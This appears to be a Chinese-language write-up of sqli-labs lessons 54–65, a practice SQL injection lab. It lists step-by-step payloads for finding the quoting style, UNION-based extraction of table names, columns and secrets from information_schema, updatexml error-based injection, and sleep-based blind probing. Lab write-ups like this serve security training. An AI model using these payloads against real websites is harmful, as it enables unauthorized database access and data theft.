less 54
只有10次机会,超过10次会是一个新的随机表名
1.?id=1 //回显正常
2.?id=1’ //回显异常
3.?id=1’ --+ //回显正常
4.?id=1’ order by 3 //回显正常
5.?id=1’ order by 4 //回显异常
6.?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+ //获得表名 z555jxywqv(随机)
7.?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘z555jxywqv’),3 --+ //获得字段名 id,sessid,secret_M0WG,tryy
8.?id=-1’ union select 1,(select group_concat(id,0x7e,sessid,0x7e,secret_M0WG,0x7e,tryy) from z555jxywqv),3 --+ //获得内容
less 55
只有14次机会,超过14次会是一个新的随机表名
经过测试 ’ 、 “ 、 ‘)的回显都显示异常
Payload:
?id=1) --+ //回显正常
同 less 54
less 56
只有14次机会,超过14次会是一个新的随机表名
Payload:
1.?id=1 //回显正常
2.?id=1’ //回显异常
3.?id=1’ --+ //回显异常 则说明包裹参数的不止是 ‘
4.?id=1’) --+ //回显正常
同less 54
less 57
只有14次机会,超过14次会是一个新的随机表名
Payload:
1.?id=1 //回显正常
2.?id=1’ //回显正常
3.?id=1” //回显异常
4.?id=1” --+ //回显正常
同less 54
less 58
只有五次机会
Payload:
1.?id=1’ //单引号报错
2.?id=-1’ union select 1,2,3–+ //没有位置回显,选用报错函数注入
3.?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)–+ //获得数据表“td6w0jfray“
4.?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’td6w0jfray’)),1)–+ //获得字段名 “id,sessid,secret_UWZE,tryy“
5.?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(0x7e,id,0x7e,sessid,0x7e,secret_UWZE,0x7e,tryy) from td6w0jfray)),1)–+ //获得字段内容
less 59
只有五次机会
Payload:
1.?id=1’ //根据回显判断出是数字型注入
2.?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)–+ //获得数据表“2rfw9zgu59 “
同less 58
less 60
只有五次机会
Payload:
- ?id=1’ //回显正常
- ?id=1” //回显异常,报错闭合方式为”)
3.?id=-1”) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)–+ //获得数据表“edoboorr5x”
同less 58
less 61
只有五次机会
Payload:
- ?id=1’ //回显异常,报错闭合方式为’))
2.?id=-1’)) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)–+ //获得数据表“o0sdv11hgc”
同less 58
less 62
这次有130次机会
Payload:
1.?id=1’ //回显异常
2.?id=1’ --+ //回显异常
2.?id=1’) //回显异常
3.?id=1’) --+ //回显正常,闭合方式为‘)
4.?id=-1’) union select 1,2,3 --+ //不显示
5.?id=1’) and sleep(5) --+ //页面有延迟,说明可以进行时间注入
6.?id=1’) and if(length(database())>1,1,sleep(5)) //猜测数据库名长度
同less 9
less 63
这次有130次机会
Payload:
1.?id=1’ //回显异常
2.?id=1’ --+ //回显正常,闭合方式为‘
同less 62
less 64
有130次机会
Payload:
1.?id=1’ //回显异常
2.?id=1’ --+ //回显异常
经过测试 “ 、 ‘) 、 “) 、 )等回显都显示异常
3.?id=1)) //回显异常
4.?id=1)) --+ //回显正常!
同less 62
less 65
130次机会
Payload:
1.?id=1’ //回显正常
2.?id=1” //回显异常
3.?id=1” --+ //回显异常
4.?id=1”) --+ //回显正常
同less 62